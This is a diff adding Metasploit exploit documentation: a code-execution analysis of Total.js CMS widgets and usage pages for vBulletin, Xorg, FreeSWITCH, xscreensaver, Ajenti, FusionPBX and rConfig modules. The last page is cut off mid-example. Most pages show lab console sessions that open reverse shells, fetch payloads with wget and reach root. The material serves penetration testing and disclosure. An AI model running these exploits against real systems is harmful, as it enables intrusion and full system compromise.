@@ -0,0 +1,136 @@
+# CVE-2019-15954: Total.js CMS 12 Widget Remote Code Execution
+
+## Introduction
+
+Total.js is a Node.js Framework for building e-commerce applications, REST services, real-time apps, or apps for Internet of Things (IoT), etc. Total.js CMS is a Content Management System (application) that is part of the Total.js framework. A commercial version is also available, and can be seen used world-wide.
+
+In Total.js CMS, a user with admin permission may be able to create a widget, and extend CMS functionalities for visitors. However, this can also be abused to upload JavaScript code that will be evaluated server side. As a result, it is possible to embed malicious JavaScript in the new widget, and gain remote code execution.
+
+## Technical Analysis
+
+In the CVE advisory, we know that the vulnerability is associated with widget creation, so this is where we start the analysis. To do this, I looked for the keyword "New widget" because that is on the widget creation page, and very quickly I found the HTML page for that, as well as the JavaScript located at:
+
+* cms/themes/admin/public/forms/widgets.html
+* cms/schemas/widgets.js
+
+The widgets.html file is what you actually look at when you're adding a new widget from the GUI. After filling out the fields, you would click on the "Save" button, which in HTML is this:
+
+```html
+<button name="submit">@(SAVE)</button>
+```
+
+And the button function is handled by the following code:
+
+```javascript
+exports.submit = function(com) {
+  SETTER('loading', 'show');
+  AJAX('POST [url]api/widgets/ REPEAT', GETR('widgets.form'), function(response) {
+    SETTER('loading', 'hide', 1000);
+    if (response.success) {
+      SETTER('snackbar', 'success', '@(Widget has been saved successfully.)');
+      EXEC('widgets/refresh');
+      com.hide();
+    }
+  });
+};
+```
+
+The following URI is important because it tells us the route:
+
+```javascript
+AJAX('POST [url]api/widgets/ REPEAT' ...
+```
+
+The route map can be found in admin.js, and our code indicates we are looking at this route:
+
+```javascript
+// MODEL: /schema/widgets.js
+// ... Other routes ...
+ROUTE('POST    #admin/api/widgets/                        *Widget --> @save');
+// ... Other routes...
+```
+
+The JavaScript comment actually reveals which JS file is responsible for the widgets routes, so clearly we need to be looking at widgets.js. The route also indicates we should be looking at a `save` function, which links to `setSave`, which starts the saving process.
+
+During the saving process, it goes through a refreshing stage (in the `refresh` function). Although there is a lot going on, the most interesting line is this:
+
+```javascript
+var obj = compile(item.body); // Line 309 (widgets.js)
+```
+
+The `compile` function parses the source code for the new widget. Apparently, the JavaScript tag is a bit customized, for example, this isn't the standard JavaScript tag prefix, it is more specific to Total.JS:
+
+```javascript
+var body = html.substring(beg, end);
+var beg = body.indexOf('>') + 1;
+var type = body.substring(0, beg);
+
+body = body.substring(beg);
+raw = raw.replace(type + body + '</script>', '');
+
+body = body.trim();
+
+if (type.indexOf('html') !== -1 || type.indexOf('plain') !== -1)
+  body_template = body;
+else if (type.indexOf('total') !== -1 || type.indexOf('totaljs') !== -1)
+  body_total = body;
+else if (type.indexOf('editor') !== -1)
+  body_editor = body;
+else
+  body_script = body;
+```
+
+After parsing, the code could be stored in a few different ways. Specifically we want to watch where these are going in code:
+
+```javascript
+// Around line 258 in widgets.js
+obj.js = body_script;
+// ... code ...
+obj.editor = body_editor;
+// ... code ...
+obj.template = body_template;
+// ... code ...
+obj.total = body_total;
+// ... code ...
+```
+
+So that's pretty much for the `compile` function, and back to the `refresh` function. Now that we have the parsed code, let's see what `refresh` is doing with the object members we're interested in watching. Well, there are some interesting ones, for example, this is what happens to `obj.total`:
+
+```javascript
+if (obj.total) {
+  var o = new WidgetInstace();
+  try {
+    (new Function('exports', obj.total))(o);
+  } catch (e) {
+    WARNING.message = 'Widget <b>{0}</b> exception: <b>{1}</b>'.format(item.name, e.message);
+    ADMIN.notify(WARNING);
+  }
+  obj.total = o;
+  rebuild = true;
+}
+```
+
+As you can see here, if we have a JavaScript code block that starts like this:
+
+```javascript
+<script total>
+  // ... something ...
+</script>
+```
+
+Then that code goes to `obj.total`, and that gets executed as a new function. To mimic that code execution, open up the Developer's Tools in your browser, enter the following (which is basically what the code above is doing):
+
+```javascript
+function WidgetInstance() {}
+var o = new WidgetInstance();
+(new Function('exports', 'console.log("Hello World!");'))(o);
+```
+
+And you should see that `console.log` is executed (which represents the user-provided script):
+
+```
+> function WidgetInstance() {}
+var o = new WidgetInstance();
+(new Function('exports', 'console.log("Hello World!");'))(o);
+> VM33:3 Hello World!
+```

documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md

@@ -0,0 +1,61 @@
+## Introduction
+
+vBulletin 5.x through 5.5.4 allows remote command execution via the `widgetConfig[code]` parameter in an `ajax/render/widget_php` `routestring` `POST` request.
+
+A proof of concept was originally published on [seclist.org](https://seclists.org/fulldisclosure/2019/Sep/31).
+
+```
+msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25
+rhosts => 192.168.1.25
+msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13
+lhost => 192.168.1.13
+msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444 
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Sending stage (38288 bytes) to 192.168.1.25
+[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.25:35772) at 2019-10-18 13:53:39 +0400
+
+meterpreter > 
+```
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/multi/http/vbulletin_widgetconfig_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set LHOST [IP]`
+6. Do: `run`
+
+## Targets
+
+```
+  Id  Name
+  --  ----
+  0   Automatic (Dropper)
+  1   Linux (Stager)
+  2   Windows (Stager)
+  3   Unix (In-Memory)
+  4   Windows (In-Memory)
+```
+
+## Options
+
+**PHP_CMD**
+
+Specify the PHP function in which you want execute the payload. Default: `shell_exec`
+
+**TARGETURI**
+
+The base URI path of vBulletin. Default: /
+
+## Advanced options
+
+**ForceExploit**
+
+Override check result.
+
+## References
+
+  1. <https://seclists.org/fulldisclosure/2019/Sep/31>

documentation/modules/exploit/multi/local/xorg_x11_suid_server_modulepath.md

@@ -0,0 +1,115 @@
+## Vulnerable Application
+
+  For Xorg server versions below `v1.20.3`, there is an incorrect permissions
+  check when starting Xorg with the `-modulepath` flag. That combined with Xorg
+  being an SUID binary, users can execute arbitrary code as root.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/local/xorg_x11_suid_server_modulepath```
+  4. Do: ```set SESSION <sess_no>```
+  5. Do: ```set TARGET <target_no>```
+  6. Do: ```run```
+  7. You should get a shell with root privileges.
+
+## Scenarios
+
+### Xorg `v1.19.3` on Centos 7.4
+
+  ```
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444
+  [*] Sending stage (816260 bytes) to 172.16.215.159
+  [*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:52816) at 2019-10-22 09:50:42 -0500
+
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : localhost.localdomain
+  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > background
+  [*] Backgrounding session 1...
+  msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
+  session => 1
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
+  lhost => 172.16.215.1
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
+  [+]  The target is vulnerable.
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444
+  [+] Passed all initial checks for exploit
+  [*] Writing launcher and compiling
+  [*] Uploading your payload, this could take a while
+  [*] Exploiting
+  [*] Sending stage (816260 bytes) to 172.16.215.159
+  [*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:52818) at 2019-10-22 09:51:38 -0500
+  [+] Deleted /tmp/libglx.so
+  [+] Deleted /tmp/.session-xehPZXcIrZ
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : localhost.localdomain
+  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  ```
+
+### Xorg `v1.19.5` on Solaris 11.4
+
+  ```
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 172.16.215.1:4444
+  [*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:49722) at 2019-10-22 09:27:45 -0500
+
+  whoami
+  space
+  uname -a
+  SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
+  background
+
+  Background session 3? [y/N]  y
+
+  msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
+  payload => cmd/unix/reverse_ksh
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
+  lhost => 172.16.215.1
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3
+  session => 3
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
+  target => 2
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
+
+  [!] SESSION may not be compatible with this module.
+  [+]  The target is vulnerable.
+  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.215.1:4444 
+  [+] Passed all initial checks for exploit
+  [*] Writing launcher and compiling
+  [*] Uploading your payload, this could take a while
+  [*] Exploiting
+  [*] Command shell session 4 opened (172.16.215.1:4444 -> 172.16.215.152:57420) at 2019-10-22 09:30:05 -0500
+  [+] Deleted /tmp/qHkvGfpTTu.c
+  [+] Deleted /tmp/libglx.so
+  [+] Deleted /tmp/.session-jRlZ4zPfO
+
+  whoami
+  root
+  uname -a
+  SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
+  ```

documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md

@@ -0,0 +1,209 @@
+## Description
+
+  This module uses the FreeSWITCH event socket interface
+  to execute system commands using the `system` API command.
+
+  The event socket service is enabled by default and listens
+  on TCP port 8021 on the local network interface.
+
+
+## Vulnerable Application
+
+  [FreeSWITCH](https://freeswitch.com) is a free and open-source software defined
+  telecommunications stack for real-time communication, WebRTC, telecommunications,
+  video, and Voice over Internet Protocol.
+
+  The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket)
+  `mod_event_socket` is a TCP based interface to control FreeSWITCH and is enabled by default.
+
+  The default values are to bind to 127.0.0.1 port 8021 and the default password is `ClueCon`.
+
+  This module has been tested successfully on FreeSWITCH versions:
+
+  1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;
+  1.8.4~64bit on Ubuntu 19.04 (x64); and
+  1.10.1~64bit on Windows 7 SP1 (EN) (x64).
+
+  Source and Installers:
+
+  * [Source Code Repository](https://github.com/signalwire/freeswitch)
+  * [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+  * [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/multi/misc/freeswitch_event_socket_cmd_exec`
+  3. Do: `set rhosts <ip>`
+  4. Do: `set rport <port>` (default: `8021`)
+  5. Do: `set password <password>` (default: `ClueCon`)
+  6. Do: `set target <target>`
+  7. Do: `run`
+  8. You should get a session
+
+
+## Options
+
+  **Password**
+
+  The password for the event socket. (default: `ClueCon`)
+
+
+## Scenarios
+
+### Windows PowerShell Target
+
+```
+msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec 
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1"
+[*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.242)
+[*] Local TCP relay created: :1234 <-> 127.0.0.1:8021
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234
+rport => 1234
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+   1   Linux (Dropper)
+   2   PowerShell (In-Memory)
+   3   Windows (In-Memory)
+   4   Windows (Dropper)
+
+
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2
+target => 2
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444 
+[*] 127.0.0.1:1234 - Login success
+[*] 127.0.0.1:1234 - Sending payload (310 bytes) ...
+[*] Sending stage (180291 bytes) to 172.16.191.242
+[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:50706) at 2019-11-02 17:31:33 -0400
+
+meterpreter > getuid
+Server username: TEST\user
+meterpreter > pwd
+C:\Program Files\FreeSWITCH
+meterpreter > sysinfo
+Computer        : TEST
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
+
+### Linux Dropper Target
+
+```
+msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec 
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1"
+[*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.172)
+[*] Local TCP relay created: :1234 <-> 127.0.0.1:8021
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234
+rport => 1234
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+   1   Linux (Dropper)
+   2   PowerShell (In-Memory)
+   3   Windows (In-Memory)
+   4   Windows (Dropper)
+
+
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 1
+target => 1
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmdstager::flavor wget
+cmdstager::flavor => wget
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
+
+[*] Started reverse TCP handler on 172.16.191.165:4444 
+[*] 127.0.0.1:1234 - Login success
+[*] 127.0.0.1:1234 - Sending payload (150 bytes) ...
+[*] 127.0.0.1:1234 - Using URL: http://0.0.0.0:8080/WuWvURUHveqo5
+[*] 127.0.0.1:1234 - Local IP: http://172.16.191.165:8080/WuWvURUHveqo5
+[*] 127.0.0.1:1234 - Client 172.16.191.172 (Wget/1.16 (linux-gnu)) requested /WuWvURUHveqo5
+[*] 127.0.0.1:1234 - Sending payload to 172.16.191.172 (Wget/1.16 (linux-gnu))
+[*] Sending stage (985320 bytes) to 172.16.191.172
+[*] 127.0.0.1:1234 - Command Stager progress - 100.00% done (120/120 bytes)
+[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.172:42478) at 2019-11-02 17:34:59 -0400
+[*] 127.0.0.1:1234 - Server stopped.
+
+meterpreter > getuid
+Server username: uid=999, gid=999, euid=999, egid=999
+meterpreter > pwd
+/
+meterpreter > sysinfo
+Computer     : 172.16.191.172
+OS           : Debian 8.5 (Linux 3.16.0-4-amd64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > 
+```
+
+
+### UNIX Generic Command Target
+
+```
+msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec 
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1"
+[*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.172)
+[*] Local TCP relay created: :1234 <-> 127.0.0.1:8021
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234
+rport => 1234
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+   1   Linux (Dropper)
+   2   PowerShell (In-Memory)
+   3   Windows (In-Memory)
+   4   Windows (Dropper)
+
+
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 0
+target => 0
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set payload cmd/unix/generic 
+payload => cmd/unix/generic
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmd "id; uname -a"
+cmd => id; uname -a
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set verbose true
+verbose => true
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
+
+[*] 127.0.0.1:1234 - Login success
+[*] 127.0.0.1:1234 - Sending payload (12 bytes) ...
+[*] 127.0.0.1:1234 - Response: Content-Type: api/response
+Content-Length: 159
+
+uid=999(freeswitch) gid=999(freeswitch) groups=999(freeswitch)
+Linux freeswitch-vm 3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u1 (2016-09-03) x86_64 GNU/Linux
+
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > 
+```

documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md

@@ -0,0 +1,79 @@
+## Description
+
+  This module exploits a vulnerability in `xscreensaver` versions
+  since 5.06 on unpatched Solaris 11 systems which allows users
+  to gain root privileges.
+
+  `xscreensaver` allows users to create a user-owned file at any
+  location on the filesystem using the `-log` command line argument
+  introduced in version 5.06.
+
+  This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
+  overwrites the log file with a shared object, and executes the shared
+  object using the `LD_PRELOAD` environment variable.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * xscreensaver version 5.15 on Solaris 11.1 (x86)
+  * xscreensaver version 5.15 on Solaris 11.3 (x86)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/solaris/local/xscreensaver_log_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `run`
+  6. You should get a new *root* session
+
+
+## Options
+
+  **XSCREENSAVER_PATH**
+
+  Path to `xscreensaver` executable. (default: `/usr/bin/xscreensaver`)
+
+  **XORG_PATH**
+
+  Path to `Xorg` executable. (default: `/usr/bin/Xorg`)
+
+
+## Scenarios
+
+### Solaris 11.3 (x86)
+
+  ```
+  msf5 > use exploit/solaris/local/xscreensaver_log_priv_esc 
+  msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Starting Xorg on display :1 ...
+  [*] Creating log file /usr/lib/secure/QKaG911RA8.so ...
+  [*] Writing '/tmp/.cqihxHb/.fjgQFF7F08.c' (248 bytes) ...
+  [*] Writing '/tmp/.cqihxHb/.K94KoDObn' (61 bytes) ...
+  [*] Executing payload...
+  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.221:39510) at 2019-10-21 03:58:47 -0400
+  [!] Tried to delete /usr/lib/secure/QKaG911RA8.so, unknown result
+  [+] Deleted /tmp/.cqihxHb/.fjgQFF7F08.c
+  [+] Deleted /tmp/.cqihxHb/.fjgQFF7F08
+  [+] Deleted /tmp/.cqihxHb/.K94KoDObn
+  [+] Deleted /tmp/.cqihxHb
+
+  id
+  uid=0(root) gid=0(root) groups=10(staff)
+  uname -a
+  SunOS solaris 5.11 11.3 i86pc i386 i86pc
+  cat /etc/release
+                               Oracle Solaris 11.3 X86
+    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
+                              Assembled 06 October 2015
+  ```
+

documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md

@@ -0,0 +1,53 @@
+## Description
+
+This module exploits a command injection in Ajenti == 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.
+
+## Vulnerable Application
+
+This module has been tested with [Ajenti 2.1.31](https://pypi.org/project/ajenti-panel/2.1.31/#files)
+
+## Setup
+
+1. `sudo pip install ajenti-panel==2.1.31 ajenti.plugin.dashboard ajenti.plugin.settings ajenti.plugin.plugins`
+2. `ajenti-panel -v`
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. `use exploit/unix/webapp/ajenti_auth_username_cmd_injection`
+  2. `set RHOSTS <rhost>`
+  3. `set LHOST <lhost>`
+  4. `exploit`
+
+## Options
+
+**RPORT**
+
+Set this to the Ajenti port. The default is 8000.
+
+**TARGETURI**
+
+Set this to the Ajenti base path. The default is `/`.
+
+
+## Scenarios
+
+### Tested Ajenti 2.1.31 on Ubuntu 19.10 x64
+
+```
+msf5 > use exploit/unix/webapp/ajenti_auth_username_cmd_injection
+msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135
+RHOSTS => 172.16.172.135
+msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1
+LHOST => 172.16.172.1
+msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit
+
+[*] Started reverse TCP handler on 172.16.172.1:4444
+[*] Exploiting...
+[*] Sending stage (53755 bytes) to 172.16.172.135
+[*] Meterpreter session 1 opened (172.16.172.1:4444 -> 172.16.172.135:53170) at 2019-11-18 19:51:04 +0300
+
+meterpreter >
+
+```

documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md

@@ -0,0 +1,83 @@
+## Description
+
+  This module uses administrative functionality available in FusionPBX
+  to gain a shell.
+
+  The Command section of the application permits users with `exec_view`
+  permissions, or superadmin permissions, to execute arbitrary system
+  commands, or arbitrary PHP code, as the web server user.
+
+
+## Vulnerable Software
+
+  This module has been tested successfully on FusionPBX version
+  4.4.1 on Ubuntu 19.04 (x64).
+
+  Software:
+
+  * https://www.fusionpbx.com/download
+  * https://github.com/fusionpbx/fusionpbx/releases
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/fusionpbx_exec_cmd_exec`
+  3. Do: `set rhosts <IP>`
+  4. Do: `set username <username>` (default: `admin`)
+  5. Do: `set password <password>`
+  6. Do: `run`
+  7. You should get a new session
+
+
+## Options
+
+  **TARGETURI**
+
+  The base path to FusionPBX (default: `/`)
+
+  **USERNAME**
+
+  The username for FusionPBX (default: `admin`)
+
+  **PASSWORD**
+
+  The password for FusionPBX
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec 
+  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
+  rhosts => 172.16.191.214
+  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
+  username => admin
+  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
+  password => PXRtwZqSkvToC4gc
+  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 
+  lhost => 172.16.191.165
+  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   Automatic (PHP In-Memory)
+     1   Automatic (Unix In-Memory)
+     2   Automatic (Linux Dropper)
+
+
+  msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] Authenticated as user 'admin'
+  [*] Sending payload (1115 bytes) ...
+  [*] Sending stage (38288 bytes) to 172.16.191.214
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400
+
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > 
+  ```
+

documentation/modules/exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.md

@@ -0,0 +1,107 @@
+## Description
+
+  This module exploits an authenticated command injection vulnerability
+  in FusionPBX versions 4.4.3 and prior.
+
+  The `exec.php` file within the Operator Panel permits users with
+  `operator_panel_view` permissions, or administrator permissions,
+  to execute arbitrary commands as the web server user by sending
+  a `system` command to the FreeSWITCH event socket interface.
+
+
+## Vulnerable Software
+
+  This module has been tested successfully on FusionPBX version
+  4.4.1 on Ubuntu 19.04 (x64).
+
+  Software:
+
+  * https://www.fusionpbx.com/download
+  * https://github.com/fusionpbx/fusionpbx/releases
+
+  At time of writing, a vulnerable version can be tested by using
+  the relevant install script for the target platform from the download
+  link above, which automatically installs all required dependencies,
+  including FreeSWITCH and the latest version of FusionPBX.
+
+  The version of FusionPBX can then be downgraded to a vulnerable version
+  by replacing the web root directory with the contents of a vulnerable
+  version, such as version 4.4.1, from the GitHub releases link above.
+
+  On Ubuntu, downgrading can be performed as follows:
+
+  ```
+  mv /var/www/fusionpbx /var/www/fusionpbx-latest
+  mkdir ~/hackyhackhack/ && cd ~/hackyhackhack/
+  wget https://github.com/fusionpbx/fusionpbx/archive/4.4.1.zip
+  unzip 4.4.1.zip
+  mv fusionpbx-4.4.1 /var/www/fusionpbx
+  ```
+
+  In the future, downgrading may not be as simple as replacing the web
+  root directory contents.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec`
+  3. Do: `set rhosts <IP>`
+  4. Do: `set username <username>`
+  5. Do: `set password <password>`
+  6. Do: `run`
+  7. You should get a new session
+
+
+## Options
+
+  **TARGETURI**
+
+  The base path to FusionPBX (default: `/`)
+
+  **USERNAME**
+
+  The username for FusionPBX
+
+  **PASSWORD**
+
+  The password for FusionPBX
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec 
+  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set rhosts 172.16.191.214
+  rhosts => 172.16.191.214
+  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set username test
+  username => test
+  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set password wBXxcY4LTAsMd46!
+  password => wBXxcY4LTAsMd46!
+  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(unix/webapp/fusionpbx_operator_panel_exec_cmd_exec) > run
+
+  [*] Started reverse TCP double handler on 172.16.191.165:4444 
+  [+] Authenticated as user 'test'
+  [*] Sending payload (295 bytes) ...
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [*] Command: echo ULzaVUoa3XPSZANH;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket A
+  [*] A: "ULzaVUoa3XPSZANH\r\n"
+  [*] Matching...
+  [*] B is input...
+  [*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.214:57626) at 2019-11-01 15:54:42 -0400
+
+  id
+  uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  pwd
+  /
+  uname -a
+  Linux ubuntu-19-04-x64 5.0.0-32-generic #34-Ubuntu SMP Wed Oct 2 02:06:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+  ```
+

documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md

@@ -0,0 +1,82 @@
+## Description
+
+  This module exploits an unauthenticated command injection vulnerability
+  in rConfig versions 3.9.2 and prior. The `install` directory is not
+  automatically removed after installation, allowing unauthenticated users
+  to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
+  as the web server user.
+
+
+## Vulnerable Software
+
+  This module has been tested successfully on [rConfig](https://rconfig.com/)
+  version 3.9.2 on CentOS 7.7.1908 (x64).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/rconfig_install_cmd_exec`
+  3. Do: `set rhosts <IP>`
+  4. Do: `run`
+  5. You should get a new session
+
+
+## Options
+
+  **TARGETURI**
+
+  The base path to rConfig install directory (default: `/install/`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec 
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
+  rhosts => 172.16.191.131
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
+  verbose => true
